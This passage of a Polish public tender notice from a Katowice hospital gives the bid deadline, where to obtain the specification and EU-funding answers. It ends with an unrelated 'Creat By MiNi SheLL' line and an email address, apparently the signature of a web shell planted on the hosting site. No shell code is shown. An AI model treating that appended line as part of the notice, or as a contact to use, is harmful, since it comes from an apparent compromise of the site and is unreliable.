rachunku bankowego Wykonawcy, - zmiana danych teleadresowych Wykonawcy, - zmiana osób
Zamawiającego wskazanych do nadzoru nad wykonaniem przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www2.bip.gcm.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny
Szpital Kliniczny nr 7 Górnośląskie Centrum Medyczne ul. Ziołowa 45/47 40-635 Katowice pok. 50
(budynek administracji)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.07.2012 godzina 09:00, miejsce: Samodzielny Publiczny Szpital Kliniczny nr 7 Górnośląskie Centrum Medyczne ul.
Ziołowa 45/47 40-635 Katowice pok. 50 (budynek administracji)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com